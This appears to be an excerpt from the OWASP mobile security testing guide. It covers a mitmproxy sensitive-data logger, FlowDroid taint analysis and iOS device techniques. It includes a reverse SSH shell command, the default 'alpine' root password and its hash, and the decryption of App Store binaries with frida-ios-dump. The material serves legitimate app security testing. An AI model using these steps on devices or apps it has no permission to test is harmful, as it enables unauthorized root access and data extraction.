# mitm_sensitive_logger.py\n\nfrom mitmproxy import http\n\n# This data would come from another file and should be defined after identifying the data that is considered sensitive for this application.\n# For example by using the Google Play Store Data Safety section.\nSENSITIVE_DATA = {\n \"precise_location_latitude\": \"37.7749\",\n \"precise_location_longitude\": \"-122.4194\",\n \"name\": \"John Doe\",\n \"email_address\": \"john.doe@example.com\",\n \"phone_number\": \"+11234567890\",\n \"credit_card_number\": \"1234 5678 9012 3456\"\n}\n\nSENSITIVE_STRINGS = SENSITIVE_DATA.values()\n\ndef contains_sensitive_data(string):\n return any(sensitive in string for sensitive in SENSITIVE_STRINGS)\n\ndef process_flow(flow):\n url = flow.request.pretty_url\n request_headers = flow.request.headers\n request_body = flow.request.text\n response_headers = flow.response.headers if flow.response else \"No response\"\n response_body = flow.response.text if flow.response else \"No response\"\n\n if (contains_sensitive_data(url) or \n contains_sensitive_data(request_body) or \n contains_sensitive_data(response_body)):\n with open(\"sensitive_data.log\", \"a\") as file:\n if flow.response:\n file.write(f\"RESPONSE URL: {url}\\n\")\n file.write(f\"Response Headers: {response_headers}\\n\")\n file.write(f\"Response Body: {response_body}\\n\\n\")\n else:\n file.write(f\"REQUEST URL: {url}\\n\")\n file.write(f\"Request Headers: {request_headers}\\n\")\n file.write(f\"Request Body: {request_body}\\n\\n\")\ndef request(flow: http.HTTPFlow):\n process_flow(flow)\n\ndef response(flow: http.HTTPFlow):\n process_flow(flow)\n
Now you can run mitmproxy with the script:
mitmdump -s mitm_sensitive_logger.py\n
Our example app has this code:
fun testPostRequest() {\n val thread = Thread {\n try {\n val url = URL(\"https://httpbin.org/post\")\n val httpURLConnection = url.openConnection() as HttpURLConnection\n httpURLConnection.requestMethod = \"POST\"\n httpURLConnection.doOutput = true\n httpURLConnection.setRequestProperty(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n val user = \"sampleUser\"\n val password = \"dummyPassword\"\n\n val postData = \"username=$user&password=$password\"\n\n val outputStream = BufferedOutputStream(httpURLConnection.outputStream)\n val bufferedWriter = BufferedWriter(OutputStreamWriter(outputStream, \"UTF-8\"))\n bufferedWriter.write(postData)\n bufferedWriter.flush()\n bufferedWriter.close()\n outputStream.close()\n\n val responseCode = httpURLConnection.responseCode\n if (responseCode == HttpURLConnection.HTTP_OK) {\n Log.d(\"HTTP_SUCCESS\", \"Successfully authenticated.\")\n } else {\n Log.e(\"HTTP_ERROR\", \"Failed to authenticate. Response code: $responseCode\")\n }\n\n } catch (e: Exception) {\n e.printStackTrace()\n }\n }\n thread.start()\n}\n
The app sends a POST request to https://httpbin.org/post
with the body username=sampleUser&password=dummyPassword
. httpbin.org
is a website that returns the request data in the response body, so we can see the data that was sent in the request.
Run the app and use it as you normally would. The script will log any sensitive data that is sent over the network to the sensitive_data.log
file.
Example console output:
[10:07:59.348] Loading script mitm_sensitive_logger.py\n[10:07:59.351] HTTP(S) proxy listening at *:8080.\n[10:08:08.188][127.0.0.1:64701] server connect httpbin.org:443 (52.206.94.89:443)\n[10:08:08.192][127.0.0.1:64709] server connect mas.owasp.org:443 (104.22.27.77:443)\n[10:08:08.245][127.0.0.1:64709] Client TLS handshake failed. The client does not trust the proxy's certificate for mas.owasp.org (OpenSSL Error([('SSL routines', '', 'ssl/tls alert certificate unknown')]))\n[10:08:08.246][127.0.0.1:64709] client disconnect\n[10:08:08.246][127.0.0.1:64709] server disconnect mas.owasp.org:443 (104.22.27.77:443)\n127.0.0.1:64701: POST https://httpbin.org/post\n << 200 OK 548b\n
Example sensitive_data.log
output:
REQUEST URL: https://httpbin.org/post\nRequest Headers: Headers[(b'Content-Type', b'application/x-www-form-urlencoded'), (b'User-Agent', b'Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)'), (b'Host', b'httpbin.org'), (b'Connection', b'Keep-Alive'), (b'Accept-Encoding', b'gzip'), (b'Content-Length', b'42')]\nRequest Body: username=sampleUser&password=dummyPassword\n\nRESPONSE URL: https://httpbin.org/post\nResponse Headers: Headers[(b'Date', b'Tue, 16 Jan 2024 09:08:08 GMT'), (b'Content-Type', b'application/json'), (b'Content-Length', b'548'), (b'Connection', b'keep-alive'), (b'Server', b'gunicorn/19.9.0'), (b'Access-Control-Allow-Origin', b'*'), (b'Access-Control-Allow-Credentials', b'true')]\nResponse Body: {\n \"args\": {}, \n \"data\": \"\", \n \"files\": {}, \n \"form\": {\n \"password\": \"dummyPassword\", \n \"username\": \"sampleUser\"\n }, \n \"headers\": {\n \"Accept-Encoding\": \"gzip\", \n \"Content-Length\": \"42\", \n \"Content-Type\": \"application/x-www-form-urlencoded\", \n \"Host\": \"httpbin.org\", \n \"User-Agent\": \"Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)\", \n \"X-Amzn-Trace-Id\": \"Root=1-65a64778-78495e9f5d742c9b0c7a75d8\"\n }, \n \"json\": null, \n \"origin\": \"148.141.65.87\", \n \"url\": \"https://httpbin.org/post\"\n}\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0108/","title":"Taint Analysis","text":"Taint analysis is an information flow analysis technique that tracks the flow of sensitive information within a program. For example, it can determine whether geolocation data collected in an Android app is being transmitted to third-party domains.
In taint analysis, data flows from a \"source\" to a \"sink\". A source is where sensitive information originates, and a sink is where this information is ultimately utilized. For instance, we can determine if the device ID retrieved by a getDeviceId()
function is transmitted as a text message via another function sendTextMessage()
. In this scenario, getDeviceId()
is the source, and sendTextMessage()
is the sink. If a direct path exists between them, it's called a leak.
In large applications, manual information flow analysis can be very time consuming and inaccurate. Taint analysis automates this, with two main methods: static and dynamic. The former examines code without running it, offering broad coverage but potentially yielding false positives. In contrast, dynamic analysis observes real-time application execution, providing actual context but possibly overlooking untriggered issues. A thorough comparison of these techniques is beyond this section's scope.
There are multiple tools which perform taint analysis on native code, including Triton and bincat. However, in this section, we'll primarily focus on Android Java code and utilize FlowDroid for the taint analysis. Another notable tool supporting taint analysis for Android apps is GDA.
For our demonstration, we'll use the FlowDroid command line tool to perform taint analysis on the InsecureShop v1.0 application.
The InsecureShop app accepts a username and password as input and stores them in the app's shared preferences. In our taint analysis, we're interested in how this stored username and password are used. In this context, the username and password are the sensitive information, and reading from shared preferences is the source. The sink in this analysis could be various operations, such as sending info over the network, transmitting info via an Intent
, or storing info in an external file.
To use FlowDroid, firstly, we need to provide an input list of potential sources and sinks to evaluate for. In our case, reading from shared preferences will be the source, while adding parameters to an Intent
will be the sink. The configuration file will look as follows (we'll name it \"source_sink.txt\"):
<android.content.SharedPreferences: java.lang.String getString(java.lang.String, java.lang.String)> -> _SOURCE_\n\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.CharSequence)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,char)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)> -> _SINK_\n
To invoke FlowDroid via the command line, use the following command:
java -jar soot-infoflow-cmd/target/soot-infoflow-cmd-jar-with-dependencies.jar \\\n -a InsecureShop.apk \\\n -p Android/Sdk/platforms \\\n -s source_sink.txt\n\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"password\", $r5) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"password\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getPassword()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"username\", $r4) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"username\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getUsername()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication - Found 2 leaks\n
The output also uses the jimple intermediate representation and reveals two leaks in the application, each corresponding to the username and password. Given that the InsecureShop app is open-source, we can refer to its source code to validate the findings, as shown below:
// file: AboutActivity.kt\n\nfun onSendData(view: View) {\n val userName = Prefs.username!!\n val password = Prefs.password!!\n\n val intent = Intent(\"com.insecureshop.action.BROADCAST\")\n intent.putExtra(\"username\", userName)\n intent.putExtra(\"password\", password)\n sendBroadcast(intent)\n\n textView.text = \"InsecureShop is an intentionally designed vulnerable android app built in Kotlin.\"\n\n }\n
Taint analysis is especially beneficial for automating data flow analysis in intricate applications. However, given the complexity of some apps, the accuracy of such tools can vary. Thus, it's essential for reviewers to find a balance between the accuracy of tools and the time spent on manual analysis.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0047/","title":"Reverse Engineering","text":"Reverse engineering is the process of taking an app apart to find out how it works. You can do this by examining the compiled app (static analysis), observing the app during runtime (dynamic analysis), or a combination of both.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0048/","title":"Static Analysis","text":"For white-box source code testing, you'll need a setup similar to the developer's setup, including a test environment that includes the Android SDK and an IDE. Access to either a physical device or an emulator (for debugging the app) is recommended.
During black-box testing, you won't have access to the original form of the source code. You'll usually have the application package in Android's APK format, which can be installed on an Android device or reverse engineered as explained in the section \"Disassembling and Decompiling\".
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/","title":"Dynamic Analysis","text":"Dynamic Analysis tests the mobile app by executing and running the app binary and analyzing its workflows for vulnerabilities. For example, vulnerabilities regarding data storage might be sometimes hard to catch during static analysis, but in dynamic analysis you can easily spot what information is stored persistently and if the information is protected properly. Besides this, dynamic analysis allows the tester to properly identify:
Analysis can be assisted by automated tools, such as MobSF, while assessing an application. An application can be assessed by side-loading it, re-packaging it, or by simply attacking the installed version.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/#basic-information-gathering","title":"Basic Information Gathering","text":"As mentioned previously, Android runs on top of a modified Linux kernel and retains the proc filesystem (procfs) from Linux, which is mounted at /proc
. Procfs provides a directory-based view of a process running on the system, providing detailed information about the process itself, its threads, and other system-wide diagnostics. Procfs is arguably one of the most important filesystems on Android, where many OS native tools depend on it as their source of information.
Many command line tools are not shipped with the Android firmware to reduce the size, but can be easily installed on a rooted device using BusyBox. We can also create our own custom scripts using commands like cut
, grep
, sort
etc, to parse the proc filesystem information.
In this section, we will be using information from procfs directly or indirectly to gather information about a running process.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0050/","title":"Binary Analysis","text":"Binary analysis frameworks give you powerful ways to automate tasks that would be almost impossible to do manually. Binary analysis frameworks typically use a technique called symbolic execution, which allow to determine the conditions necessary to reach a specific target. It translates the program's semantics into a logical formula in which some variables are represented by symbols with specific constraints. By resolving the constraints, you can find the conditions necessary for the execution of some branch of the program.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0051/","title":"Tampering and Runtime Instrumentation","text":"First, we'll look at some simple ways to modify and instrument mobile apps. Tampering means making patches or runtime changes to the app to affect its behavior. For example, you may want to deactivate SSL pinning or binary protections that hinder the testing process. Runtime Instrumentation encompasses adding hooks and runtime patches to observe the app's behavior. In mobile application security however, the term loosely refers to all kinds of runtime manipulation, including overriding methods to change behavior.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/","title":"Accessing the Device Shell","text":"One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the iOS shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#remote-shell","title":"Remote Shell","text":"In contrast to Android where you can easily access the device shell using the adb tool, on iOS you only have the option to access the remote shell via SSH. This also means that your iOS device must be jailbroken in order to connect to its shell from your host computer. For this section we assume that you've properly jailbroken your device and have either Cydia (see screenshot below) or Sileo installed. In the rest of the guide we will reference to Cydia, but the same packages should be available in Sileo.
In order to enable SSH access to your iOS device you can install the OpenSSH package. Once installed, be sure to connect both devices to the same Wi-Fi network and take a note of the device IP address, which you can find in the Settings -> Wi-Fi menu and tapping once on the info icon of the network you're connected to.
You can now access the remote device's shell by running ssh root@<device_ip_address>
, which will log you in as the root user:
$ ssh root@192.168.197.234\nroot@192.168.197.234's password:\niPhone:~ root#\n
Press Control + D or type exit
to quit.
When accessing your iOS device via SSH consider the following:
root
and mobile
.alpine
.Remember to change the default password for both users root
and mobile
as anyone on the same network can find the IP address of your device and connect via the well-known default password, which will give them root access to your device.
If you forget your password and want to reset it to the default alpine
:
/private/etc/master.password
on your jailbroken iOS device (using an on-device shell as shown below) root:xxxxxxxxx:0:0::0:0:System Administrator:/var/root:/bin/sh\n mobile:xxxxxxxxx:501:501::0:0:Mobile User:/var/mobile:/bin/sh\n
xxxxxxxxx
to /smx7MYTQIi2M
(which is the hashed password alpine
)During a real black box test, a reliable Wi-Fi connection may not be available. In this situation, you can use usbmuxd to connect to your device's SSH server via USB.
Connect macOS to an iOS device by installing and starting iproxy:
$ brew install libimobiledevice\n$ iproxy 2222 22\nwaiting for connection\n
The above command maps port 22
on the iOS device to port 2222
on localhost. You can also make iproxy run automatically in the background if you don't want to run the binary every time you want to SSH over USB.
With the following command in a new terminal window, you can connect to the device:
$ ssh -p 2222 root@localhost\nroot@localhost's password:\niPhone:~ root#\n
Small note on USB of an iDevice: on an iOS device you cannot make data connections anymore after 1 hour of being in a locked state, unless you unlock it again due to the USB Restricted Mode, which was introduced with iOS 11.4.1
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#on-device-shell-app","title":"On-device Shell App","text":"While usually using an on-device shell (terminal emulator) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or check some configuration. For example, you can install NewTerm 2 via Cydia for this purpose (it supports iOS 6.0 to 12.1.2 at the time of this writing).
In addition, there are a few jailbreaks that explicitly disable incoming SSH for security reasons. In those cases, it is very convenient to have an on-device shell app, which you can use to first SSH out of the device with a reverse shell, and then connect from your host computer to it.
Opening a reverse shell over SSH can be done by running the command ssh -R <remote_port>:localhost:22 <username>@<host_computer_ip>
.
On the on-device shell app run the following command and, when asked, enter the password of the mstg
user of the host computer:
ssh -R 2222:localhost:22 mstg@192.168.197.235\n
On your host computer run the following command and, when asked, enter the password of the root
user of the iOS device:
ssh -p 2222 root@localhost\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/","title":"Host-Device Data Transfer","text":"There might be various scenarios where you might need to transfer data from the iOS device or app data sandbox to your host computer or vice versa. The following section will show you different ways on how to achieve that.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#copying-app-data-files-via-ssh-and-scp","title":"Copying App Data Files via SSH and SCP","text":"As we know now, files from our app are stored in the Data directory. You can now simply archive the Data directory with tar
and pull it from the device with scp
:
iPhone:~ root# tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\niPhone:~ root# exit\n$ scp -P 2222 root@localhost:/tmp/data.tgz .\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#grapefruit","title":"Grapefruit","text":"After starting Grapefruit you can select the app that is in scope for testing. There are various functions available, of which one is called \"Finder\". When selecting it, you will get a listing of the directories of the app sandbox.
When navigating through the directories and selecting a file, a pop-up will show up and display the data either as hexadecimal or text. When closing this pop-up you have various options available for the file, including:
When you are starting objection you will find the prompt within the Bundle directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # pwd print\nCurrent directory: /var/containers/Bundle/Application/DABF849D-493E-464C-B66B-B8B6C53A4E76/org.owasp.MSTG.app\n
Use the env
command to get the directories of the app and navigate to the Documents directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n/var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n
With the command file download <filename>
you can download a file from the iOS device to your host computer and can analyze it afterwards.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # file download .com.apple.mobile_container_manager.metadata.plist\nDownloading /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\n
You can also upload files to the iOS device with file upload <local_file_path>
.
During development, apps are sometimes provided to testers via over-the-air (OTA) distribution. In that situation, you'll receive an itms-services link, such as the following:
itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\n
You can use the ITMS services asset downloader tool to download the IPA from an OTA distribution URL. Install it via npm:
npm install -g itms-services\n
Save the IPA file locally with the following command:
# itms-services -u \"itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\" -o - > out.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#extracting-the-app-binary","title":"Extracting the App Binary","text":"If you have an IPA with a decrypted app binary, unzip it and you are ready to go. The app binary is located in the main bundle directory (.app), e.g. Payload/Telegram X.app/Telegram X
. See the following subsection for details on the extraction of the property lists.
On macOS's Finder, .app directories are opened by right-clicking them and selecting \"Show Package Content\". On the terminal you can just cd
into them.
IMPORTANT NOTE: In the United States, the Digital Millennium Copyright Act 17 U.S.C. 1201, or DMCA, makes it illegal and actionable to circumvent certain types of DRM. However, the DMCA also provides exemptions, such as for certain kinds of security research. A qualified attorney can help you determine if your research qualifies under the DMCA exemptions. (Source: Corellium)
If you don't have the original IPA, then you need a jailbroken device where you will install the app (e.g. via App Store). Once installed, you need to extract the app binary from memory and rebuild the IPA file. Because of DRM, the app binary file is encrypted when it is stored on the iOS device, so simply pulling it from the Bundle (either through SSH or Objection) will not be sufficient to reverse engineer it.
You can verify this by running this command on the app binary:
otool -l Payload/Telegram X.app/Telegram X | grep -i LC_ENCRYPTION -B1 -A4\nLoad command 12\n cmd LC_ENCRYPTION_INFO\n cmdsize 20\n cryptoff 16384\n cryptsize 32768\n cryptid 1\n
Or with radare2:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto true\n
In order to retrieve the unencrypted version, you can use frida-ios-dump. It will extract the unencrypted version from memory while the application is running on the device.
First, configure Frida-ios-dump dump.py
:
localhost
with port 2222
when using iproxy, or to the actual IP address and port of the device from which you want to dump the binary.User = 'root'
) and password (Password = 'alpine'
) in dump.py
to the ones you have set.Enumerate the apps installed on the device by running python dump.py -l
:
PID Name Identifier\n---- --------------- -------------------------------------\n 860 Cydia com.saurik.Cydia\n1130 Settings com.apple.Preferences\n 685 Mail com.apple.mobilemail\n 834 Telegram ph.telegra.Telegraph\n - Stocks com.apple.stocks\n ...\n
You can dump the selected app, for example Telegram, by running python dump.py ph.telegra.Telegraph
After a couple of seconds, the Telegram.ipa
file will be created in your current directory. You can validate the success of the dump by removing the app and reinstalling it (e.g. using ios-deploy ios-deploy -b Telegram.ipa
). Note that this will only work on jailbroken devices, as otherwise the signature won't be valid.
You can verify that the app binary is now unencrypted:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto false\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#thinning-the-app-binary","title":"Thinning the App Binary","text":"The app binary may contain multiple architectures, such as armv7
(32-bit) and arm64
(64-bit). That is called a \"fat binary\".
One example is the Damn Vulnerable iOS App DVIA v1 to demonstrate this.
Unzip the app and run otool:
unzip DamnVulnerableiOSApp.ipa\ncd Payload/DamnVulnerableIOSApp.app\notool -hv DamnVulnerableIOSApp\n
The output will look like this:
DamnVulnerableIOSApp (architecture armv7):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 33 3684 NOUNDEFS DYLDLINK TWOLEVEL PIE\nDamnVulnerableIOSApp (architecture arm64):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 33 4192 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
To ease the app analysis, it's recommended create a so-called thin binary, which contains one architecture only:
lipo -thin armv7 DamnVulnerableIOSApp -output DVIA32\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0055/","title":"Repackaging Apps","text":"If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer with macOS to perform all the steps indicated in the article \"Patching iOS Applications\" from the objection Wiki. Once you're done you'll be able to patch an IPA by calling the objection command:
objection patchipa --source my-app.ipa --codesign-signature 0C2E8200Dxxxx\n
Finally, the app needs to be installed (sideloaded) and run with debugging communication enabled. Perform the steps from the article \"Running Patched iOS Applications\" from the objection Wiki (using ios-deploy).
ios-deploy --bundle Payload/my-app.app -W -d\n
Refer to \"Installing Apps\" to learn about other installation methods. Some of them doesn't require you to have a macOS.
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"iOS Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/","title":"Installing Apps","text":"When you install an application without using Apple's App Store, this is called sideloading. There are various ways of sideloading which are described below. On the iOS device, the actual installation process is then handled by the installd daemon, which will unpack and install the application. To integrate app services or be installed on an iOS device, all applications must be signed with a certificate issued by Apple. This means that the application can be installed only after successful code signature verification. On a jailbroken phone, however, you can circumvent this security feature with AppSync, a package available in the Cydia store. It contains numerous useful applications that leverage jailbreak-provided root privileges to execute advanced functionality. AppSync is a tweak that patches installd, allowing the installation of fake-signed IPA packages.
Different methods exist for installing an IPA package onto an iOS device, which are described in detail below.
Please note that iTunes is no longer available in macOS Catalina. If you are using an older version of macOS, iTunes is still available but since iTunes 12.7 it is not possible to install apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#cydia-impactor","title":"Cydia Impactor","text":"Cydia Impactor was originally created to jailbreak iPhones, but has been rewritten to sign and install IPA packages to iOS devices via sideloading (and even APK files to Android devices). Cydia Impactor is available for Windows, macOS and Linux. A step by step guide and troubleshooting steps are available on yalujailbreak.net.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#libimobiledevice","title":"libimobiledevice","text":"On Linux and also macOS, you can alternatively use libimobiledevice, a cross-platform software protocol library and a set of tools for native communication with iOS devices. This allows you to install apps over a USB connection by executing ideviceinstaller. The connection is implemented with the USB multiplexing daemon usbmuxd, which provides a TCP tunnel over USB.
The package for libimobiledevice will be available in your Linux package manager. On macOS you can install libimobiledevice via brew:
brew install libimobiledevice\nbrew install ideviceinstaller\n
After the installation you have several new command line tools available, such as ideviceinfo
, ideviceinstaller
or idevicedebug
.
# The following command will show detailed information about the iOS device connected via USB.\n$ ideviceinfo\n# The following command will install the IPA to your iOS device.\n$ ideviceinstaller -i iGoat-Swift_v1.0-frida-codesigned.ipa\n...\nInstall: Complete\n# The following command will start the app in debug mode, by providing the bundle name. The bundle name can be found in the previous command after \"Installing\".\n$ idevicedebug -d run OWASP.iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ipainstaller","title":"ipainstaller","text":"The IPA can also be directly installed on the iOS device via the command line with ipainstaller. After copying the file over to the device, for example via scp, you can execute ipainstaller with the IPA's filename:
ipainstaller App_name.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ios-deploy","title":"ios-deploy","text":"On macOS you can also use the ios-deploy tool to install iOS apps from the command line. You'll need to unzip your IPA since ios-deploy uses the app bundles to install apps.
unzip Name.ipa\nios-deploy --bundle 'Payload/Name.app' -W -d -v\n
After the app is installed on the iOS device, you can simply start it by adding the -m
flag which will directly start debugging without installing the app again.
ios-deploy --bundle 'Payload/Name.app' -W -d -v -m\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#xcode","title":"Xcode","text":"It is also possible to use the Xcode IDE to install iOS apps by doing the following steps:
Sometimes an application can require to be used on an iPad device. If you only have iPhone or iPod touch devices then you can force the application to accept to be installed and used on these kinds of devices. You can do this by changing the value of the property UIDeviceFamily to the value 1 in the Info.plist file.
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\n <key>UIDeviceFamily</key>\n <array>\n <integer>1</integer>\n </array>\n\n</dict>\n</plist> \n
It is important to note that changing this value will break the original signature of the IPA file so you need to re-sign the IPA, after the update, in order to install it on a device on which the signature validation has not been disabled.
This bypass might not work if the application requires capabilities that are specific to modern iPads while your iPhone or iPod is a bit older.
Possible values for the property UIDeviceFamily can be found in the Apple Developer documentation.
One fundamental step when analyzing apps is information gathering. This can be done by inspecting the app package on your host computer or remotely by accessing the app data on the device. You'll find more advance techniques in the subsequent chapters but, for now, we will focus on the basics: getting a list of all installed apps, exploring the app package and accessing the app data directories on the device itself. This should give you a bit of context about what the app is all about without even having to reverse engineer it or perform more advanced analysis. We will be answering questions such as:
When targeting apps that are installed on the device, you'll first have to figure out the correct bundle identifier of the application you want to analyze. You can use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n---- ------------------- -----------------------------------------\n6847 Calendar com.apple.mobilecal\n6815 Mail com.apple.mobilemail\n - App Store com.apple.AppStore\n - Apple Store com.apple.store.Jolly\n - Calculator com.apple.calculator\n - Camera com.apple.camera\n - iGoat-Swift OWASP.iGoat-Swift\n
It also shows which of them are currently running. Take a note of the \"Identifier\" (bundle identifier) and the PID if any as you'll need them afterwards.
You can also directly open Grapefruit and after selecting your iOS device you'll get the list of installed apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the IPA as explained in Basic Testing Operations - Obtaining and Extracting Apps.
You can unzip the IPA using the standard unzip
or any other ZIP utility. Inside you'll find a Payload
folder containing the so-called Application Bundle (.app). The following is an example in the following output, note that it was truncated for better readability and overview:
$ ls -1 Payload/iGoat-Swift.app\nrutger.html\nmansi.html\nsplash.html\nabout.html\n\nLICENSE.txt\nSentinel.txt\nREADME.txt\n\nURLSchemeAttackExerciseVC.nib\nCutAndPasteExerciseVC.nib\nRandomKeyGenerationExerciseVC.nib\nKeychainExerciseVC.nib\nCoreData.momd\narchived-expanded-entitlements.xcent\nSVProgressHUD.bundle\n\nBase.lproj\nAssets.car\nPkgInfo\n_CodeSignature\nAppIcon60x60@3x.png\n\nFrameworks\n\nembedded.mobileprovision\n\nCredentials.plist\nAssets.plist\nInfo.plist\n\niGoat-Swift\n
The most relevant items are:
Info.plist
contains configuration information for the application, such as its bundle ID, version number, and display name._CodeSignature/
contains a plist file with a signature over all files in the bundle.Frameworks/
contains the app native libraries as .dylib or .framework files.PlugIns/
may contain app extensions as .appex files (not present in the example).*.nib
files (storing the user interfaces of iOS app), localized content (<language>.lproj
), text files, audio files, etc.The information property list or Info.plist
(named by convention) is the main source of information for an iOS app. It consists of a structured file containing key-value pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are expected to have an Info.plist
file. You can find all possible keys in the Apple Developer Documentation.
The file might be formatted in XML or binary (bplist). You can convert it to XML format with one simple command:
plutil
, which is a tool that comes natively with macOS 10.2 and above versions (no official online documentation is currently available):plutil -convert xml1 Info.plist\n
apt install libplist-utils\nplistutil -i Info.plist -o Info_xml.plist\n
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Info.plist
file by just inspecting the file or by using grep -i <keyword> Info.plist
:
UsageDescription
(see \"iOS Platform APIs\")CFBundleURLTypes
(see \"iOS Platform APIs\")UTExportedTypeDeclarations
/ UTImportedTypeDeclarations
(see \"iOS Platform APIs\")NSAppTransportSecurity
(see \"iOS Network Communication\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#app-binary","title":"App Binary","text":"iOS app binaries are fat binaries (they can be deployed on all devices 32- and 64-bit). In contrast to Android, where you can actually decompile the app binary to Java code, the iOS app binaries can only be disassembled.
Refer to the chapter Tampering and Reverse Engineering on iOS for more details.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#native-libraries","title":"Native Libraries","text":"iOS apps can make their codebase modular by using different elements. In the MASTG we will refer to all of them as native libraries, but they can come in different forms:
.dylib
extension) are also used but must be part of a framework bundle. Standalone Dynamic Libraries are not supported on iOS, watchOS, or tvOS, except for the system Swift libraries provided by Xcode.XCFrameworks
): Xcode 11 supports distributing binary libraries using the XCFrameworks
format which is a new way to bundle up multiple variants of a Framework, e.g. for any of the platforms that Xcode supports (including simulator and devices). They can also bundle up static libraries (and their corresponding headers) and support binary distribution of Swift and C-based code. XCFrameworks
can be distributed as Swift Packages.You can view native libraries in Grapefruit by clicking on the Modules icon in the left menu bar:
And get a more detailed view including their imports/exports:
They are available in the Frameworks
folder in the IPA, you can also inspect them from the terminal:
$ ls -1 Frameworks/\nRealm.framework\nlibswiftCore.dylib\nlibswiftCoreData.dylib\nlibswiftCoreFoundation.dylib\n
or from the device with objection (as well as per SSH of course):
